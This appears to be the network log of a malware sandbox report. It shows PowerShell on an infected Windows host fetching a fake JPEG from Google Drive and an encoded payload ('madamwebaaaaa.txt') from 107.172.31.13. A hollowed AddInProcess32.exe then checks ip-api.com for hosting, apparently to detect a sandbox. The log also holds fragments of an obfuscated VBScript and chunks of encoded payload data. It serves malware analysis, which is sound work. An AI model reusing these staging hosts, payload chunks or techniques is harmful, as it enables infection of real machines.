                                          Oct 24, 2024 08:59:05.176774025 CEST1236INData Raw: 29 00 2c 00 20 00 22 00 54 00 68 00 65 00 20 00 27 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55 00 53 00 45 00 52 00 4e 00 41 00 4d 00 45 00 20 00 26 00 20 00 22 00 27 00 20 00 6f 00 70 00 74 00 69 00 6f 00 6e 00 20 00
                                          Data Ascii: ), "The '-" & NPARA_USERNAME & "' option must be specified for '-auth:basic'" ASSERTBOOL not optDic.Argum
                                          Oct 24, 2024 08:59:05.176809072 CEST1236INData Raw: 68 00 65 00 20 00 27 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00 41 00 5f 00 43 00 45 00 52 00 54 00 20 00 26 00 20 00 22 00 27 00 20 00 6f 00 70 00 74 00 69 00 6f 00 6e 00 20 00 69 00 73 00 20 00 6e 00 6f 00 74 00 20 00 76 00 61 00
                                          Data Ascii: he '-" & NPARA_CERT & "' option is not valid for '-auth:digest'" farrachoFlags = farrachoFlags OR wsman.S
                                          Oct 24, 2024 08:59:05.177676916 CEST1236INData Raw: 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 43 00 45 00 52 00 54 00 29 00 2c 00 20 00 22 00 54 00 68 00 65 00 20 00 27 00 2d 00 22 00 20 00 26 00 20 00 4e 00 50 00 41 00 52 00
                                          Data Ascii: gumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option is not valid for '-auth:negotiate'" farrachoF
                                          Oct 24, 2024 08:59:05.177711010 CEST636INData Raw: 42 00 4f 00 4f 00 4c 00 20 00 6e 00 6f 00 74 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 50 00 41 00 53 00 53 00
                                          Data Ascii: BOOL not optDic.ArgumentExists(NPARA_PASSWORD), "The '-" & NPARA_PASSWORD & "' option is not valid for '-auth:certificate'
                                          Oct 24, 2024 08:59:05.182136059 CEST1236INData Raw: 20 00 6f 00 73 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 3e 00 3d 00 20 00 6f 00 73 00 56 00 69 00 73 00 74 00 61 00 2c 00 20 00 22 00 54 00 68 00 65 00 20 00 73 00 70 00 65 00 63 00 69 00 66 00 69 00 65 00 64 00 20 00 27 00 2d 00 22 00
                                          Data Ascii: osVersion >= osVista, "The specified '-" & NPARA_AUTH & "' flag '" & authVal & "' has an invalid value."


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.2249168107.172.31.13803984C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 24, 2024 08:59:27.046372890 CEST80OUTGET /madamwebaaaaa.txt HTTP/1.1
                                          Host: 107.172.31.13
                                          Connection: Keep-Alive
                                          Oct 24, 2024 08:59:27.703258038 CEST1236INHTTP/1.1 200 OK
                                          Content-Type: text/plain
                                          Last-Modified: Wed, 23 Oct 2024 20:46:07 GMT
                                          Accept-Ranges: bytes
                                          ETag: "3ad7b6958c25db1:0"
                                          Server: Microsoft-IIS/10.0
                                          Date: Thu, 24 Oct 2024 06:59:27 GMT
                                          Content-Length: 325632
                                          Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8DUAAAAMAwAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgCN4TesJWblN3ch9CPK0gPvZmbJR3c1JHdvwDIgoQD+kHdpJXdjV2cvwDIgACIK0gPzV2ZlxWa2lm
                                          Oct 24, 2024 08:59:27.703353882 CEST1236INData Raw: 63 51 52 57 5a 30 4e 58 5a 31 46 58 5a 79 39 43 50 67 41 43 49 67 41 43 49 4b 30 67 50 76 49 53 5a 7a 78 57 59 6d 4a 53 50 7a 4e 58 5a 6a 4e 57 51 70 56 48 49 69 49 58 5a 72 39 6d 64 75 6c 30 63 68 4a 53 50 73 56 6d 64 6c 78 47 49 73 56 6d 64 6c
                                          Data Ascii: cQRWZ0NXZ1FXZy9CPgACIgACIK0gPvISZzxWYmJSPzNXZjNWQpVHIiIXZr9mdul0chJSPsVmdlxGIsVmdlxkbvlGd1NWZ4VEZlR3clVXclJHPgACIgACIgAiCN4jIzYnLtNXY602bj1Cdm92cvJ3Yp1WLzFWblh2YzpjbyVnI9Mnbs1GegMXZnVGbpZXayBFZlR3clVXclJHPgACIgACIK0gP5RXayV3YlNHPgACIgoQD+IiM25
                                          Oct 24, 2024 08:59:27.703408957 CEST424INData Raw: 41 77 41 41 4d 41 45 41 41 41 45 41 2b 41 41 41 41 76 42 67 5a 41 34 47 41 4a 42 51 5a 41 77 47 41 70 42 67 52 41 63 47 41 75 42 51 61 41 49 48 41 30 42 77 55 41 45 41 41 41 49 41 48 45 41 4c 41 41 41 41 41 41 41 41 41 75 42 77 62 41 6b 47 41 30
                                          Data Ascii: AwAAMAEAAAEA+AAAAvBgZA4GAJBQZAwGApBgRAcGAuBQaAIHA0BwUAEAAAIAHEALAAAAAAAAAuBwbAkGA0BQYAwGAzBgbAEGAyBAVAAAAEAAJAAAAAAwbAYGAuBQSAUGAsBQaAYEAyBQYAYFABAAAAQEAAAAAAAAAAAAAAAAAAAQAAAAAEAAAAAAAAAwPAAAAAAQAAAAAAAAAAEAAAAQAAAg/vTQvAAAAAAwTAYEAOBQSA8FAOB
                                          Oct 24, 2024 08:59:27.703455925 CEST1236INData Raw: 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 41 41 51 42 41 41 41 67 42 67 41 41 41 49 41 41 41 41 51 41 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                          Data Ascii: ABAAAAAAAAAAAAAAAAAAAACAAQBAAAgBgAAAIAAAAQAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                          Oct 24, 2024 08:59:27.703501940 CEST1236INData Raw: 45 39 45 6f 45 68 4c 6f 45 4f 63 77 42 57 6b 49 67 53 41 41 41 46 34 51 4c 42 4b 52 48 42 41 77 42 49 67 51 4c 42 4b 52 48 74 45 6f 45 74 45 6f 45 64 67 67 44 48 63 51 45 68 45 52 49 52 49 67 41 41 63 51 67 41 4b 52 48 41 41 67 42 49 45 49 67 53
                                          Data Ascii: E9EoEhLoEOcwBWkIgSAAAF4QLBKRHBAwBIgQLBKRHtEoEtEoEdggDHcQEhERIRIgAAcQgAKRHAAgBIEIgS0BCDcACA4RAZLoEVcAATgQACAiBA4RA9JRFGgAAegQBdgQ1CKhBHwQwCKBAgUQzCKRABAiBNLoEAAQBOUsgSEAAGggDOUZgSElEBLoE9KoEHcAEIgQdR4ABHcQDOEAAEgQDNIAAFsQDBAABLAAIDErgSEQtCKRFIA
                                          Oct 24, 2024 08:59:27.703545094 CEST424INData Raw: 41 41 6f 41 43 35 4a 52 2b 42 4b 68 44 64 30 61 67 53 34 51 41 4e 4a 52 46 47 63 67 45 49 67 67 44 64 34 51 41 4e 4a 52 46 4f 67 67 44 4f 34 51 48 59 46 6f 45 4f 45 51 54 53 55 78 43 48 6b 42 43 73 46 6f 45 73 46 6f 45 42 30 6b 45 56 4d 77 42 4e
                                          Data Ascii: AAoAC5JR+BKhDd0agS4QANJRFGcgEIggDd4QANJRFOggDO4QHYFoEOEQTSUxCHkBCsFoEsFoEB0kEVMwBNQWgREgCFUngRoQAAYwCOEAAEwVgREgCFgwBIgwBIgACIogCIgwCcFYEdgACIgwEHgBCD0BCIggDdgACIkwBNAWgREgCF0QDBAAB1JYELEAAGUngRcQAAYQdCGBCBAgB1JYE1JYE1JYECAwCIcACIcACK0hCIgwCIg
                                          Oct 24, 2024 08:59:27.703598022 CEST1236INData Raw: 43 49 67 41 43 49 34 51 48 49 67 41 43 4f 34 41 43 49 45 6e 67 53 55 51 41 4e 4a 52 46 52 63 67 47 49 4d 51 48 44 30 78 41 64 67 67 44 64 67 67 44 4f 6b 77 42 50 41 67 48 42 6f 41 42 63 34 51 41 67 51 41 43 74 4a 6f 45 43 63 67 42 31 34 6b 4e 74
                                          Data Ascii: CIgACI4QHIgACO4ACIEngSUQANJRFRcgGIMQHD0xAdggDdggDOkwBPAgHBoABc4QAgQACtJoECcgB14kNtaFO/GDCO0hDOIAAGQnEBEOgRUxBIQnEBEOgRUBdSMwBMQnEB0kEVYACI4QHAFoEO4QBdUQHAGoEOUQHF0BgBKhDO4AC4FoEYFoEF0hDOAUgSEQTSUxFH8CCtGoEBAiBIggDdAUgS4gDF0RBdAYgS4QBdUQHAGoEO4
                                          Oct 24, 2024 08:59:27.703809023 CEST1236INData Raw: 45 56 63 41 44 42 4b 52 41 4e 4a 52 46 4f 49 51 59 52 55 42 44 42 4d 42 41 54 49 51 59 52 55 42 41 67 6f 41 44 42 4b 52 41 4e 4a 52 46 4f 49 51 56 43 47 52 46 4e 45 77 45 41 4d 68 41 56 4a 59 45 56 41 41 49 4c 77 51 67 53 45 51 54 53 55 68 44 43
                                          Data Ascii: EVcADBKRANJRFOIQYRUBDBMBATIQYRUBAgoADBKRANJRFOIQVCGRFNEwEAMhAVJYEVAAILwQgSEQTSUhDC0lEVwADBKRANJRFOIQXSURAK4ACMEoEBEOgRUBDBKRANJRFOIQVCGRFAFoEB0kEVwQgSwQgSEQTSUhDCEWEVwQgSEQTSUhDC0lEVwUgS4QBd4gDAFoEB0kEV0wBJhQBdgACF0BCFAiCIElgSEdgS0kgSgQBdUQHF0
                                          Oct 24, 2024 08:59:27.703855038 CEST424INData Raw: 42 64 67 77 41 49 67 41 43 49 55 51 48 4f 77 77 42 51 67 77 41 64 4d 51 48 44 30 78 41 64 67 67 44 64 41 55 67 53 34 51 48 4f 34 67 44 4f 30 68 44 4f 30 42 43 4f 30 68 44 41 46 6f 45 42 30 6b 45 56 4d 78 42 6d 67 41 43 4f 30 42 43 4f 30 42 51 42
                                          Data Ascii: BdgwAIgACIUQHOwwBQgwAdMQHD0xAdggDdAUgS4QHO4gDO0hDO0BCO0hDAFoEB0kEVMxBmgACO0BCO0BQBKhDO0hDO0hDAFoEB0kEVwwBagACO0BCO0hDd4gDO4gDO4QHO4QHAFoEB0kEVAxBdggDVIoEOUQHRHoEVIoEF0hDJcwEI4ACCAQBI4ACO4ACO4gDJcwCO4gABHYEVcgDOIQvBKRFHgwAdMQHD0xAd4gDCEcgRUhDOI
                                          Oct 24, 2024 08:59:27.703902960 CEST1236INData Raw: 48 42 45 41 49 46 4d 41 43 42 41 43 42 49 67 41 43 49 4d 51 48 49 67 77 42 48 6f 41 48 64 34 51 41 41 55 41 48 63 77 68 44 44 41 67 42 49 77 52 48 63 30 42 43 4f 30 42 43 4f 30 68 44 64 34 51 48 4f 67 67 44 4f 30 68 44 64 34 51 41 4e 4a 52 46 50
                                          Data Ascii: HBEAIFMACBACBIgACIMQHIgwBHoAHd4QAAUAHcwhDDAgBIwRHc0BCO0BCO0hDd4QHOggDO0hDd4QANJRFPcQHA4RAlFoEVAgHdEQAQ0ACO4gAdJRFOIQwBGRFOEQ4AGRFAFoEB0kEVAUgS4AUBKhDd4gDB0kEVAUgSEQTSUxCHITDCGhDIIAIHAgHBUWgSUBAeEQTSURABABEOEgCDgAAeEQZBKRFA4RAlFoEVIQAQIhDIEAIEg
                                          Oct 24, 2024 08:59:27.709222078 CEST1236INData Raw: 58 53 55 68 44 43 45 63 67 52 55 42 44 42 4d 42 41 54 49 51 77 42 47 52 46 41 41 79 43 4f 34 67 41 64 4a 52 46 4f 49 51 76 42 4b 52 46 4d 45 77 45 41 4d 68 41 39 47 6f 45 56 41 41 49 4c 41 55 67 53 34 67 41 64 4a 52 46 49 67 41 51 42 4b 68 44 43
                                          Data Ascii: XSUhDCEcgRUBDBMBATIQwBGRFAAyCO4gAdJRFOIQvBKRFMEwEAMhA9GoEVAAILAUgS4gAdJRFIgAQBKhDCkcgRUxAdAUgS4gABHYEV4gDC0lEV4gABHYEVAUgSAUgSUQHO4ACO0BQBKBQBKhDO4AQBKhDC0lEVAVgS4gDO4gDAFoEB0kEVkxBQhQtBKRAgYQsBKBAgUgDtGoEBAiBIMQHAFoEB0kEVAUgS4gDOgAWBKhDO4AQBK


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.2249169208.95.112.1803136C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                          TimestampBytes transferredDirectionData
                                          Oct 24, 2024 08:59:28.842453003 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                          Host: ip-api.com
                                          Connection: Keep-Alive
                                          Oct 24, 2024 08:59:29.436485052 CEST174INHTTP/1.1 200 OK
                                          Date: Thu, 24 Oct 2024 06:59:29 GMT
                                          Content-Type: text/plain; charset=utf-8
                                          Content-Length: 5
                                          Access-Control-Allow-Origin: *
                                          X-Ttl: 60
                                          X-Rl: 44
                                          Data Raw: 74 72 75 65 0a
                                          Data Ascii: true


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.2249166216.58.212.1744433984C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          TimestampBytes transferredDirectionData
                                          2024-10-24 06:59:08 UTC121OUTGET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1
                                          Host: drive.google.com
                                          Connection: Keep-Alive
                                          2024-10-24 06:59:09 UTC1319INHTTP/1.1 303 See Other
                                          Content-Type: application/binary
                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                          Pragma: no-cache
                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                          Date: Thu, 24 Oct 2024 06:59:08 GMT
                                          Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                                          Strict-Transport-Security: max-age=31536000
                                          Content-Security-Policy: script-src 'report-sample' 'nonce-w0OQf0Y6Lf7BzFUtDAmNeQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                          Cross-Origin-Opener-Policy: same-origin
                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                          Server: ESF
                                          Content-Length: 0
                                          X-XSS-Protection: 0
                                          X-Frame-Options: SAMEORIGIN
                                          X-Content-Type-Options: nosniff
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                          Connection: close


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.2249167142.250.186.974433984C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          TimestampBytes transferredDirectionData
                                          2024-10-24 06:59:10 UTC139OUTGET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1
                                          Host: drive.usercontent.google.com
                                          Connection: Keep-Alive
                                          2024-10-24 06:59:12 UTC4906INHTTP/1.1 200 OK
                                          Content-Type: image/jpeg
                                          Content-Security-Policy: sandbox
                                          Content-Security-Policy: default-src 'none'
                                          Content-Security-Policy: frame-ancestors 'none'
                                          X-Content-Security-Policy: sandbox
                                          Cross-Origin-Opener-Policy: same-origin
                                          Cross-Origin-Embedder-Policy: require-corp
                                          Cross-Origin-Resource-Policy: same-site
                                          X-Content-Type-Options: nosniff
                                          Content-Disposition: attachment; filename="new_image-new.jpg"
                                          Access-Control-Allow-Origin: *
                                          Access-Control-Allow-Credentials: false
                                          Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                          Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                          Accept-Ranges: bytes
                                          Content-Length: 2239109
                                          Last-Modified: Mon, 21 Oct 2024 13:42:20 GMT
                                          X-GUploader-UploadID: AHmUCY3nz9cVAIOAy9WKqXgToGIZ4m0jPojs8lBy78uF2aIvPQ7kLw4hcnJaDT3vDPCBtmfWCkc9Cqaq2Q
                                          Date: Thu, 24 Oct 2024 06:59:12 GMT
                                          Expires: Thu, 24 Oct 2024 06:59:12 GMT
                                          Cache-Control: private, max-age=0
                                          X-Goog-Hash: crc32c=WqxmdA==
                                          Server: UploadServer
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                          Connection: close
                                          2024-10-24 06:59:12 UTC4906INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                          Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                          2024-10-24 06:59:12 UTC4885INData Raw: 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e de 2f b9 cd 04 62 f1 19 03 ed 55 b5 34 6c 13 99 53 48 aa 43 28 23 68 01 89 e7 9c 98 27 46 81 d1 49 00 1d c6 fb 9c 07 6f 7c 8a 24 76 64 ec a4 5e 15 62 d3 c0 8c e5 e5 24 03 e9 02 c5 62 1a 6d 62 bb 00 cc 14 ad 81 78 71 36 e4 61 be af 8c 0c ad 42 99 26 76 51 44 9a 0a 16 b8 c5 99 19 0d 32 90 7e 23 35 a4 11 b3 15 27 e2 0f 4b e3 17 d4 ed 10 80 24 dc 4f 40 70 33 eb
                                          Data Ascii: 8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}E./bU4lSHC(#h'FIo|$vd^b$bmbxq6aB&vQD2~#5'K$O@p3
                                          2024-10-24 06:59:12 UTC1323INData Raw: 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7 e5 81 e9 07 8b 40 da 67 d5 0f 0e d3 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38 a3 b3 cb 29 6b 35 f0 2c 72 ad e3 50 00 36 f8 74 25 bd ed f9 ff 00 c5 99 f3 17 91 43 33 12 d4 7f 11 ba e7 b6 2e 18 b2 d8 8c 00 bf e2 16 0e 06 be b7 c5 22 62 a9 1e 8e 28 db 68 66
                                          Data Ascii: #k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*@g)w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%C3."b(hf
                                          2024-10-24 06:59:12 UTC1378INData Raw: e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a ea 53 53 2c 72 6d 0a b1 86 20 1e 7a fe 59 89 11 d7 6a 17 64 26 79 1a e8 90 cc 76 df c7 a0 ca b3 a3 43 24 b3 6a 7f 7b c0 45 ae 4d 77 bf 6c 67 c3 5e 72 fb 20 75 60 80 ca 55 ba 13 44 1f e7 81 53 a2 f1 b4 86 49 8c b3 20 4e 4a 89 da c8 fa 1c 57 45 ac f1 1d 44 a4 c5 aa 76 65
                                          Data Ascii: I@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{SS,rm zYjd&yvC$j{EMwlg^r u`UDSI NJWEDve
                                          2024-10-24 06:59:12 UTC1378INData Raw: d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4 78 ee 01 6e c3 a6 0b f6 84 1a 2f da f4 cd 33 8d 41 69 34 c7 72 a8 51 b7 62 71 ed d3 bf 7b be 3a 66 ef d9 08 53 67 da 44 1a 69 62 f1 18 b4 4e 93 ab 23 16 45 43 10 29 60 05 03 d2 d4 a0 0a af 86 64 7d b5 d6 e9 b5 bf b4 81 3b 23 16 94 69 24 01 db 90 1a 28 d8 0e bf 1c 0d 1f
                                          Data Ascii: cf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#xn/3Ai4rQbq{:fSgDibN#EC)`d};#i$(
